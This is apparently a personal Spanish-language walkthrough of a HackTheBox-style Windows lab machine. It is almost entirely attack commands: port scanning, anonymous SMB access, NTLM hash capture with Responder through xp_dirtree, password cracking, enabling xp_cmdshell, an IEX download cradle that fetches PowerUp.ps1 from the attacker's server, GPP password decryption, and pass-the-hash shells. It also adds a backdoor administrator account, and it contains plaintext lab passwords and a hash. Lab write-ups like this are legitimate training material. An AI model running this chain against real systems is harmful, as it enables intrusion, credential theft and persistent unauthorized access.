nmap -p- --open -T5 -v -n 10.129.1.147

nmap -p- --open -T5 -v -n 10.129.1.147 --max-retries 0 -oG allPorts

![[Pasted image 20210812134529.png]]

extractPorts allPorts

![[Pasted image 20210812134843.png]]

nmap -sCV -pX 10.129.1.147 -oN targeted --version-intensity 0

![[Pasted image 20210812135536.png]] ![[Pasted image 20210812134928.png]]


crackmapexec smb 10.129.1.147

![[Pasted image 20210812135140.png]]

smbclient -L 10.129.1.147 -N

Vemos que podemos acceder a Reports

![[Pasted image 20210812135437.png]]

Vemos que está abierto el puerto 1433, que corresponde a ms-sql-s

locate mssqlclient.py

![[Pasted image 20210812140137.png]]

![[Pasted image 20210812140505.png]]

smbclient "//10.129.1.147/Reports/" -N

	get "Currency volume Report.xlsm"
	exit

![[Pasted image 20210812141049.png]]

olevba Currency Volume Report.xlsm

![[Pasted image 20210812141624.png]]

crackmapexec smb 10.129.1.147 -u 'reporting' -p 'PcwTWTHRwryjc$c6'

crackmapexec smb 10.129.1.147 -u 'reporting' -p 'PcwTWTHRwryjc$c6' -d WORKGROUP

![[Pasted image 20210812142358.png]]

![[Pasted image 20210812143116.png]]

![[Pasted image 20210812143902.png]]

![[Pasted image 20210812144052.png]]

Vemos el hash de NTLM

![[Pasted image 20210812144627.png]]

python2 /opt/Responder/Responder.py -I tun0 -rdw

![[Pasted image 20210812145020.png]]

xp_dirtree "\\10.10.14.108\si

![[Pasted image 20210812145716.png]]

john --wordlist=/usr/share/wordlists/rockyou.txt querier_hash.txt

![[Pasted image 20210812150001.png]]

crackmapexec 10.129.1.147 -u 'mssql-svc' -p 'corporate568' -d WORKGROUP

![[Pasted image 20210812150821.png]]

![[Pasted image 20210812151040.png]]

sp_configure "show advanced", 1

sp_configure "xp_cmdshell", 1

reconfigure

xp_cmdshell "whoami"

![[Pasted image 20210812151148.png]]

xp_cmdshell "ipconfig"

![[Pasted image 20210812151940.png]]

cp /home/kali/Desktop/boxes/Invoke-PowerShellTcp.ps1 .

python3 -m http.server 8888

![[Pasted image 20210812152306.png]]

Parece que un servicio restablece las configuraciones anteriores a sus valores por defecto.

![[Pasted image 20210812152438.png]]

ipconfig

puede ser potato

![[Pasted image 20210812152847.png]]

whoami /priv

![[Pasted image 20210812154319.png]]

Agregamos Invoke-AllChecks al final de PowerUp.ps1

Levantamos un servidor HTTP con Python

python3 -m http.server 8888

![[Pasted image 20210812154606.png]]

![[Pasted image 20210812154545.png]]

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.108:8888/PowerUp.ps1')

![[Pasted image 20210812154826.png]]

Podemos ver el servicio UsoSvc. Los pasos están en este wiki:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Example with Windows 10 - CVE-2019-1322 UsoSvc

![[Pasted image 20210812160513.png]]

Vemos las credenciales encontradas en Groups.xml

![[Pasted image 20210812160705.png]]

Se puede ver el valor cifrado que se le asigna a cpassword

![[Pasted image 20210812160843.png]]

gpp-decrypt "HASH"

Vemos que es la misma contraseña: MyUnclesAreMarioAndLuigi!!1!

![[Pasted image 20210812161013.png]]

crackmapexec smb 10.129.1.147 -u 'Administrator' -p 'MyUnclesAreMarioAndLuigi!!1!'

![[Pasted image 20210812161841.png]]

crackmapexec smb 10.129.1.147 -u 'Administrator' -p 'MyUnclesAreMarioAndLuigi!!1! -d WORKGROUP --sam'

![[Pasted image 20210812161841.png]]

python3 /opt/impacket/examples/smbexec.py WORKGROUP/Administrator@10.129.1.147 -hashes :2dcefe78334b42c0ce483b8e1b2886ab

![[Pasted image 20210812165648.png]]

net user cu3rv0x pass123 /add

![[Pasted image 20210812165815.png]]

net localgroup "Administrators" cu3rv0x /add

![[Pasted image 20210812165933.png]]

net share attacker_folder=C:\Windows\Temp /GRANT:Administrators, FULL

![[Pasted image 20210812170110.png]]

reg add HKLM\SOFTWARE\Microsoft\CurrentVersion\System\Policies /v LocalAccountTokentFilterPolicy /t REG_DWORD /d 1 /f

![[Pasted image 20210812170455.png]]

![[Pasted image 20210812170626.png]]

crackmapexec smb 10.129.1.147 -u 'cu3rv0x' -p 'pass123'

![[Pasted image 20210812164657.png]]

python3 /opt/impacket/examples/wmiexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe -hashes :2dcefe78334b42c0ce483b8e1b2886ab

![[Pasted image 20210812161431.png]]

python3 /opt/impacket/examples/psexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe

![[Pasted image 20210812161504.png]]

